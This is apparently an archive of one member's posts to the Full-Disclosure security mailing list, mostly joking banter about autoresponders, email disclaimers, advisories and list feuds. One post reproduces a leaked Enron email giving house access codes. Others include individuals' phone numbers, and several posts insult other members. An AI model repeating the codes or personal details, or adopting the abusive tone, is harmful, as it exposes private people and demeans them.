2008-05-09 Thread Randal T. Rioux

On Fri, May 9, 2008 4:23 am, West, Bill (USA) wrote:
 I am no longer on-site full time and have limited access to e-mail. I will
 respond to you as soon as I can. If your issue is an emergency, please use
 the contacts below.

 Emergencies for MTU Users: Contact Augustin Schuster, +1-860-667-6620
 Emergencies for T-Systems  MTU Management: Contact Mike Bouranis,
 +1-248-276-3459

 Thanks


Folks, it is 2008. Like cell phones, e-mail autoresponders are no longer
cool. Use a separate address for mailing lists (like a personal or
disposable one) so we don't get bombarded with your junk.

Did I mention the social engineering treasures sent around the world with
each one? Do you really work in security?

Gah!

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] netdev threadjack and spam and al-qaeda mi5 underground contacts secrets

2008-04-11 Thread Randal T. Rioux

On Fri, April 11, 2008 4:41 pm, n3td3v wrote:

 I'm an unemployed working class dude, i'm not part of the industry.

Can one be unemployed and working class at the same time?

If one works in security in a capacity to earn an income, would that not
automatically place them in the industry?



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] hacking a pacemaker

2008-03-14 Thread Randal T. Rioux

On Wed, March 12, 2008 4:57 am, Gadi Evron wrote:
 Almost a year ago I gave a talk at the CCC Camp in Germany I called
 hacking
 the bionic man. It even made Wired, in some fashion.
 http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html
 http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html

 In the talk, among other things such as the DNA and scripting languages,
 medical doctors and reverse engineers...  was about cybernetic hacking.
 I gave some predictions, some for 2 years, others 40 years. Some again
 were
 pure science fiction. I was wrong on the 2 years, it's here.

 Today, this came up in the news (hat tip to Paul Ferguson on the funsec
 mailing
 list):
 http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1oref=slogin

  The threat seems largely theoretical. But a team of computer security
 researchers plans to report Wednesday that it had been able to gain
 wireless
 access to a combination heart defibrillator and pacemaker.

 They were able to reprogram it to shut down and to deliver jolts of
 electricity
 that would potentially be fatal . if the device had been in a person. In
 this
 case, the researcher were hacking into a device in a laboratory. 


When I got my pacemaker I was working on some RF programming project.

My doctor told me to find another job, he could sense my curiosity.

Who could resist such fun?!

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Dude VanWinkle's Death

2008-02-11 Thread Randal T. Rioux

I always think of these pics when those precious snowflakes post nonsense:

http://i118.photobucket.com/albums/o100/EMPulse_of_KC/itg_quarterly.jpg

http://www.stevelambe.com/posts/Nerd.jpg

http://www.encyclopediadramatica.com/images/8/88/Itg.jpg

Attention whores, the lot of them.

Par for the course...


On Mon, February 11, 2008 2:51 pm, Geoffrey Gowey wrote:
 I can't even believe some of the people on this list would take this
 posting as a joke.  This could have been any of us.  Disagreeing about a
 persons opinion and discussing is part of being on this list, but it's
 something else entirely when, solely based on what they voiced on a
 professional mailing list about professional topics, some of the members
 are rejoicing. Now that is just purely tasteless and cold hearted.

 I guess the fact that these people who are rejoicing are the same group
 that hide behind anonymous mail just goes to show that keyboard bravery
 really can separate a person from their humanity.  For those of you
 keyboard warriors who may disagree with some of the people here and voice
 your disagreement in a manner befitting a toddler I normally chalk up
 your nonsense to immaturity, but celebrating the death of someone who
 maintained his professionalism is inhuman.  It has been par for the
 course for years to have a heavy helping of nonsense come from those who
 would hide their identity not for professional reasons, but for them to
 act out what Freud defined as their Id.  This topic, however, shows these
 same bunch of people for what they truly are: self-serving immature
 cowards.

 I never knew really knew this person while he was alive and I am not
 trying to paint a picture of him as a saint, but for the immature lot on
 this list now would be a good time to know when to refrain from your
 impulse of banging out some immature posting.  Show some small measure of
 humanity and let those affected who knew this person grieve without your
 antics.

 On Feb 11, 2008 7:40 AM, Jonathan Glass [EMAIL PROTECTED] wrote:


 http://www.timesreporter.com/index.php?ID=79446r=6Category=7

 Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in his home
 on Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976.

 At the time of his death, Justin was employed at the Georgia Institute
 of Technology's Office of Information Technology in the Division of
 Architecture and Infrastructure.

 Justin is survived by his parents, mother Carol Anson Stanwyck (Doug),
 and father Free Polazzo (Janet), brother Chad Polazzo (Lori), and
 stepsister Liz Stanwyck. Other area surviving relatives are Betty
 Anson, Wendy (Wagner) Muzechuk, Ashley and Maggie Haverfield and James
 Anson (Marilyn) from Illinois.

 A memorial service will be held Sunday, Feb. 10, 2008, in Atlanta.

 It's been a sad week for the friends of Dude VanWinkle.

 --JG

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [FDSA] Notepad Highly CriticalCross-SiteScripting (XSS) Vulnerability

2008-01-17 Thread Randal T. Rioux

 Fredrick Diggle Security Advisory

Application: Notepad
Versions: 5.1.2600.2180 verified to be vulnerable
Platforms: Microsoft Windows (All Versions)
Bugs: Cross Site Scripting (XSS)
Severity: Critically High
Date: 17 Jan 2008
Credit: Estr Hinan

###

That’s a really funny “security risk”. I don’t agree with you, because
otherwise every editor, which is able to save HTML Files, is a security
problem. So vi, Dreamweaver, emacs… are all unsecure? It is your decision,
to open a HTML file or not. And (if here are some MS guys) please don’t fix
this “issue”, because sometimes, if you haven’t a professional tool at the
moment, the Windows editor can be useful, too.  Also, if you need to edit
some small Scripts.

Yours, 
SR


Speaking of professional tools...

Let's hope this was just a language translation error and not a fully 
understood response.

Lighten up, folks.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread Randal T. Rioux

[EMAIL PROTECTED] said:

Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original 
source (wasn't it written on stone tablets?). About 50% is C, with a healthy 
mix of obsoletes making the difference. How something so elegant could be 
spawned from such chaos is beyond me.

Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! grin

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed]QuietMove ( D - )

2007-12-31 Thread Randal T. Rioux

 snip hack snip snip
 QuiteMove
 http://www.quitemove.com
 QuietMove
 snip snip hack snip

A tad more attention to details would be nice.

Good thing you're not graded on spelling here. C-.


Happy New Year,
Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security contact in att

2007-09-22 Thread Randal T. Rioux

minor float wrote:
 hi
 
 has anybody security contact in att?

http://www.nsa.gov/contacts/index.cfm

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Am I missing anything ?

2007-07-24 Thread Randal T. Rioux


http://uncyclopedia.org/wiki/Pot_v._Kettle



Kradorex Xeron wrote:
 Simon and Joey,
 
 Your comments are not contributing anything of value to the list and is 
 causing SNR of the list to go down.
 
 I strongly suggest for you to both take your personal banter off-list. I 
 suspect that the rest of the list does not want to hear your personal banter 
 toward each other.
 
 This is a security list, not a space for your personal bickering. Grow up.
 
 On Monday 23 July 2007 18:48, Simon Smith wrote:
 Right kid... Can we also agree that you are immature? I mean, we can't lay
 this to rest unless we come to a compromise. Frankly, I don't feel that it
 would be a compromise if you didn't come half way in this relationship.

 While we're at it... Lets also agree that you're a coward, probably fat and
 lethargic... With no real friends... Who never really gets laid?

 Yeah I think that about sums it up... ;]

 On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote:
 No, I forgot. I now remember, thank you. As long as we agree that
 you were wrong, I was right, and you are an ignorant jackass who
 may or may not have had sexual relations with the Oreo named KF, I
 see no need for this thread to continue.

 J

 On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED]

 wrote:
 You are right with respect to your RFI comment... But as far as me
 learning
 anything, don't count on it. I am after all an ignorant jackass
 remember?

SNIP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Macro threats

2007-06-05 Thread Randal T. Rioux

Muscarella, Sebastian (IT) wrote:
snip
 
 
 NOTICE: If received in error, please destroy and notify sender. Sender
 does not intend to waive confidentiality or privilege. Use of this email
 is prohibited when received in error.
 
 
 
 

1. Shouldn't I destroy the sender *after* notifying him?

2. You may not intend to waive confidentiality or privilege, but you did.

3. You can't prohibit what I do with this email. It is mine now. Moohahaha!

Seriously. These tags piss me off. There is no legal justification. It
just makes the company's admins look like uneducated asses. I encourage
all organizations to accept the fact that your emails are community
property once you hit send. There is no e-mail Postal police nor should
there be. Encrypt everything.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The Cyber war on Iran

2007-04-04 Thread Randal T. Rioux

Paul Schmehl wrote:
SNIP
 You seem to be living under the delusion that your actions can somehow
 influence the extremists.  There's only two actions that will influence
 the extremists in any way and that is to kill or imprison them. 
 Anything else you might try, like trying to make nice with them or
 negotiate with them, is a complete waste of time and merely hastens your
 own death or imprisonment.
 

I can't believe you made a public statement about killing or imprisoning
Mr. Bush. Of course, along with a few dozen of his hench(wo)men as well.

Be careful, they'll send you to another country to torture you. Or is
that even necessary now since he's wiped his ass with our Constitution?

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Simcard 0day.

2007-01-01 Thread Randal T. Rioux

Blue Boar wrote:
 dfklsddshd wrote:
 1. Open attachment.
 
 Does this actually work on people on a security mailing list?
 
   BB
 
 Complete scanning result of Simcard.com, received in VirusTotal at
 01.02.2007, 02:38:58 (CET).
  SNIP

you would be quite surprised, i'm sure.

randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation

2006-12-12 Thread Randal T. Rioux

Josh Bressers wrote:
 eEye Research - http://research.eeye.com

 Intel Network Adapter Driver Local Privilege Escalation

 Release Date:
 December 7, 2006

 Date Reported:
 July 10, 2006

 Severity:
 Medium (Local Privilege Escalation to Kernel)

 Systems Affected:
 Windows 2000, XP, 2003, Vista
 Intel PRO 10/100   - 8.0.27.0 or previous
 Intel PRO/1000 - 8.7.1.0  or previous
 Intel PRO/1000 PCI - 9.1.30.0 or previous
 Linux
 Intel PRO 10/100   - 3.5.14  or previous
 Intel PRO/1000 - 7.2.7   or previous
 Intel PRO/10GbE- 1.0.109 or previous
 UnixWare/SCO6
 Intel PRO 10/100   - 4.0.3  or previous
 Intel PRO/1000 - 9.0.15 or previous
 
 It's worth noting that this advisory is misleading.  This flaw does not
 affect the Linux drivers.  The Linux drivers do not support the NDIS API
 and the OID concept that Windows does.
 

Thanks for the confirmation... I thought I had gone mad for a bit there.
It just didn't sound right. The version numbers threw me off. Does
anyone know how these specific Linux driver version numbers were determined?

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enron Mail archive..... oops

2006-10-30 Thread Randal T. Rioux

Thierry Zoller wrote:
 Dear List ,
 
 Search the Enron mail archives, for example Password :
 
 http://enron.trampolinesystems.com/search/FBI#focus=/search/password
 

I hope this code was changed:

*

Aspen Security Codes
Email details

From:
Sally Keepers
To:
[EMAIL PROTECTED] , [EMAIL PROTECTED] ,
[EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] ,
[EMAIL PROTECTED] , Kenneth Lay (hide last 2)
Sent:
19/09/2000 at 11:26

Email metadata

Themes:

The message

Per Margie, the access code for the #2 house is 2001, for the #3 house it is
20011.

*

So many interesting emails to waste valuable time reading :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [OT for crybaby list-nazis] blah blah now D.O.A.P.

2006-09-02 Thread Randal T. Rioux

William Lefkovics wrote:
 Tangental to this discussion is the no doubt (to be) controversial UK film
 D.O.A.P. soon to be screening in Toronto.
 
 http://www.e.bell.ca/filmfest/2006/media_centre/news_releaseItem.asp?id=261
 
 It's a docu-drama of the possible ramifications following the ficticious
 assassination of George Bush in Chicago in 2007.
 
 Is it the London Bridge you have for sale?


I'm guessing it ends with the world exploding. Because the only thing
worse than the asshat we now have at the wheel here (USA) would be
Cheney steering us into an iceberg. (Trivia! Cheney and I have the same
cardiologist... WTF)

Politics aside, I like movies that stir the pot. It could be interesting.

As for the bridge... sure, L.B. works. We may have a buyer from Dallas ;-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: George Bush appoints a 9 year old to... blah blah blah

2006-09-01 Thread Randal T. Rioux

Paul Schmehl wrote:
 --On Tuesday, August 29, 2006 17:34:24 -0400 [EMAIL PROTECTED] wrote:
 
 On Tue, 29 Aug 2006 14:55:09 CDT, Paul Schmehl said:
  1] Hezbollah has managed to become an important presence in the
  Lebanese Parliament

 They just left out - by killing opposition leaders and threatening
 others.

 Like your government doesn't do that too?

 Uhright.

Wow.

I have a bridge for sale... interested?

Is there a library at your school? Stop by sometime.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IBM to buy ISS

2006-08-24 Thread Randal T. Rioux

Mike Owen wrote:
 Sounds like IBM is going to buy out ISS. Having too much experience in
 dealing with IBM contractors and support, I don't think this is a good
 thing for ISS or their customers.
 
 http://www.iss.net/about/press_center/releases/us_ibm_08233006.html

You would think IBM would try and add a security company to their ranks.
It is definitely something they should consider, rather than expanding
their waistline with bloatware.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tempest today

2006-08-20 Thread Randal T. Rioux

[EMAIL PROTECTED] wrote:
 On Sat, 19 Aug 2006 18:49:09 -0500 Bipin Gautam
 [EMAIL PROTECTED] wrote:
 Ok, here is something from the book that I was trying to
 assemble/write.
 
 Some Links: http://www.eskimo.com/~joelm/tempest.html
 http://www.erikyyy.de/tempest/
 
 Lets begin

 SNIP SNIP SNIP
 
 Please help make the list self-policing.  Follow the list charter
 and note that self-promotion is forbidden.

Please don't quote the entire message in your response if you have
nothing useful to add.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PassMark?

2006-06-12 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Gary E. Miller wrote:
 Yo All!
 
 I thought I'd actually risk a real security question here.
 
 Any one seen the PassMark (www.passmarksecurity.com) security system
 in action?
 

Yes.

Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent
financial client corp. of mine.

I'm not impressed with it.

Randy

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0
o6/Swjo9ZIyc4Hsb7223koo=
=s8LO
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tool Release - Tor Blocker

2006-06-04 Thread Randal T. Rioux

Jason Areff wrote:
 Those acronoyms prove that I know more than you apparently. Way to
 demonstrate your l33t hax0r skills.
 
 Jason Areff
 CISSP, A+, MCSE, Security+ == Better than Steven Rakick
 

I haven't heard someone brag about an MCSE in almost a decade.

The + ones are just pay to have.

Even I have a CISSP. It just took people a couple years to figure out
how to hack that test (aka READ a study guide).

I'm sorry, but as someone with letters and crap as well, I must say I
like to save them for the resume and job/contract hunting. Managers
care. People that actually play in this sandbox of ours don't.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full Disclosure Code of conduct

2006-05-06 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Aaron Gray wrote:
 I am suggesting that we all cooperate and produce a Code of Conduct
 for participating on the Full Disclosure mailing list.
  
 Suggested start :-
  
 1) No Swearing
 2) No slagging others off
 3) No selling of exploits and vulnerabilities

4) Rename it SecurityFocus FD

Your number 2 is half the fun of this list. It makes people think twice
before posting something senseless. Though it isn't 100% effective, it
is better than having a paid moderator deleting messages.

Put in a swear filter. Net Nanny or something.

I do appreciate your goal, however this is a dirty and nasty arena. It
was designed to be an alternative to the cleansed and censored corporate
controlled lists.

I must say, FD is still friendlier than the underground BBSs of the 80's
 90's. Good times.


Randal T. Rioux | Procyon Labs
IT Security RD and Consulting
Virtual: www.procyonlabs.com
Physical: DC / Baltimore
PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFEXVkbRrGMQdCNGUERA8CxAJ95PqTgl/ybUa112N2GVzK7X/bBwACfY0wy
AHCtL10wRWtNXBbCJ/amTNw=
=kdaz
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IE7 Zero Day

2006-05-04 Thread Randal T. Rioux

[EMAIL PROTECTED] wrote:
 If you are interested in bidding.  I can provide you wtih an 
 account to provide the funds.  Social Security numbers are for 
 American citizens only so don't assume I am such a person.
 

I'll start the bidding at $1.25 USD. Do you take checks?

I have a slighty used half-liter bottle of Mountain Dew for trade if
you're willing to barter.

Let me know... I'm serious.

Randy

PS I found that the rotors on my Jeep wear down faster than they should.
Does anyone know a contact at Daimler/Chrylser that would be interested
in buying this vulnerability information? I don't have a fix yet though.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security at .edus

2006-04-23 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Brian Eaton wrote:
 On 4/22/06, Sol Invictus [EMAIL PROTECTED] wrote:
 
What you don't realize is that just by posting here that an Educational 
Institution
is vulnerable to this,  Some Readers (not me) might already be scanning for
web vulnerabilities at these sites across the US.
 
 I suspect the anonymous educational institution in question is hardly
 the only vulnerable site out there.  Universities tend to be fairly
 decentralized places, where academic freedom can count for a lot more
 than a secure network.  Plus a university network has fewer secrets to
 protect than a business.
 

Tell that to the DoD sponsored research labs within many universities.

Randy

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFESyCERrGMQdCNGUERA7iZAJ43URV3IhCRIb0b+6LDoBg5zi+dqACdFlI7
88fAbReRVK534l0ZLqlsx6U=
=LrNi
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

2006-04-19 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Rodrigo Barbosa wrote:
 On Wed, Apr 19, 2006 at 07:09:11AM +0100, n3td3v wrote:
 
On 4/19/06, Randal T. Rioux [EMAIL PROTECTED] wrote:
I don't think the industry needs someone to verify an advisory for them.
 
 
 Actually, you are wrong there.
 
 More than one company pays mine to do just that. The volume of information
 contained and the huge number of advisories can cost companies some big
 bucks.
 
 Then again, my company states pretty clear on all contracts that we
 will only filter and analise the advisories, not produce original
 ones.
 
 As for Secunia, I really can't comment.
 

Fix your quoter. I didn't write that. n3td3v did.

Randy
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFERiozRrGMQdCNGUERA+x2AJ9RBarecedPpyPtqfsnDvF4PDvPowCdFIMa
ZdPQI2qL/Rugks5uc+Ru/Q0=
=oedH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

2006-04-18 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

n3td3v wrote:

 If they did something special with their website like Securityfocus
 does, then I might be able to bare their illegal footer message spam,
 and their scene whore republication of advisories they claim are
 Secunia exclusives.

What does SF offer? Stale news and constant subliminal ads for Symantec
products? Google ads *vomit*? An abysmal mailing list moderated by a cat
sleeping on the delete button?

I don't care what is on Secunia's site or what they do. They let
everyone bitch, fight and we're better with it than without.

You're here. You must get something out of it to stay.

I hate the Bush regime - but I'm not moving to Canada!

Randy
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD4DBQFERc8aRrGMQdCNGUERA2T6AJiVsdDNOo6RoiXK2h3fVetaDV2OAJ0Wzjvs
U8xptEQR+Fr0+WyQZ+I8HA==
=mY8c
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Noise

2006-03-29 Thread Randal T. Rioux


No. He needs to disconnect from AOL because his sister needs the phone
and his mom just yelled to him in the basement to come up for dinner.

php0t wrote:
 You need a hug.
 
 -Original Message-
 *From:* [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] *On Behalf Of *n3td3v
 *Sent:* Thursday, March 30, 2006 12:57 AM
 *To:* full-disclosure@lists.grok.org.uk
 *Subject:* Re: [Full-disclosure] Noise
 
 I finished school 11 years ago, infact I left on my own accordance
 (when I was 14) because they were going to chuck me out of school
 anyway. I soon got involved in stealing cars, brekaing into houses,
 and taking goods from shops. All my criminal friends went to jail, I
 was the only one left. I started using computers to pass the time
 (when I was 18) when having no one left to hang about with, and I
 used my knowledge of criminality to work out the bad guys at Yahoo.
 I then met an employee (who will remain unnamed) to act as an
 informant for Yahoo. I then started to find my own vulnerabilities
 to Yahoo, which I reported to them. They started disrespecting me, 
 I setup my own security group to show them that I could be a match
 against them and continue to compromise their systems. I then went
 on a public crusade to tell the public all about their flaws that I
 had been keeping secret for years. Their employees who thought were
 befriending me to keep in tap with info I had were told finally to
 f*** off just last week, and now there is no connection between
 n3td3v and the yahoo security team, infact, I mailed the official
 address and told them I wouldn't be mailign them ever again. And
 thats the current situation, upto date. Seiden at yahoo (security
 consultant/advisor/hacker) whatever you want to call him is now
 pissed off because he's getting no info feed into his corporate
 security team anymore... and the consultants and engineers who had
 opened dialog with me are now sitting in paranoia.
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-26 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Gadi Evron wrote:
snip.cut.hack
 of security attitude I wonder why anybody believes OpenBSD is the most
 secure OS around.

No - that would be OpenVMS duck!  :-)

At least until HP kills it.

Randy. still wondering what is 'open' about VMS

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFEJkoXRrGMQdCNGUERAxXeAJsGwsgHx3bIQPpQVA5rM+PEEZMn1QCff4qk
fgjq68/XYJXXmvVg7n84R6I=
=pIi8
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: SURROUNDED / SF Symantec

2006-03-21 Thread Randal T. Rioux

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Javor Ninov wrote:
 do you realize that your so-called popularity is based on the fact that
 FD is not moderated ? strange .. i don't see you on securityfocus.com
 
 
 n3td3v wrote:
 
No THINK required, IS BIG, FACT.
 

Not to defend the mighty 'd3v, but securityfocus.com, aka Symantec, is
trash. They delete any posting to any of their owned lists that say even
the slightest bad thing about any of their weak products.

Despite the trolls, FD is the last great pasture of free security
discussion. The securityfocus lists are for clueless management types
looking to pick up buzzwords for their next big useless presentation to
the CEOs.

Randy
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFEIBKnRrGMQdCNGUERA23sAJ4xpl/9YwH/5eM+XR3KwmxT2givmwCdFYRd
pSmkEoRaD5eWtY9ZFRm4nGg=
=FpR4
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Reported Google Vuln

2006-02-23 Thread Randal T. Rioux

Dave Korn wrote:
 nodialtone wrote:
 
Google funzies.

[Snip]

Reference:

http://seclists.org/lists/fulldisclosure/2006/Feb/0553.html
 
 
   Ok, I give up.  Why are you posting a report to the full-disclosure list 
 to announce a post that was posted to... the full-disclosure list?  Is this 
 some kind of mail-loop joke?
 
 
 cheers,
   DaveK

my head just exploded. guts hurt from laughing. thanks dave.

the dreaded fibonacci vulnerability!! it gets worse with each posting! ahh!

time for sleep...
randy
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

56 matches

Mail list logo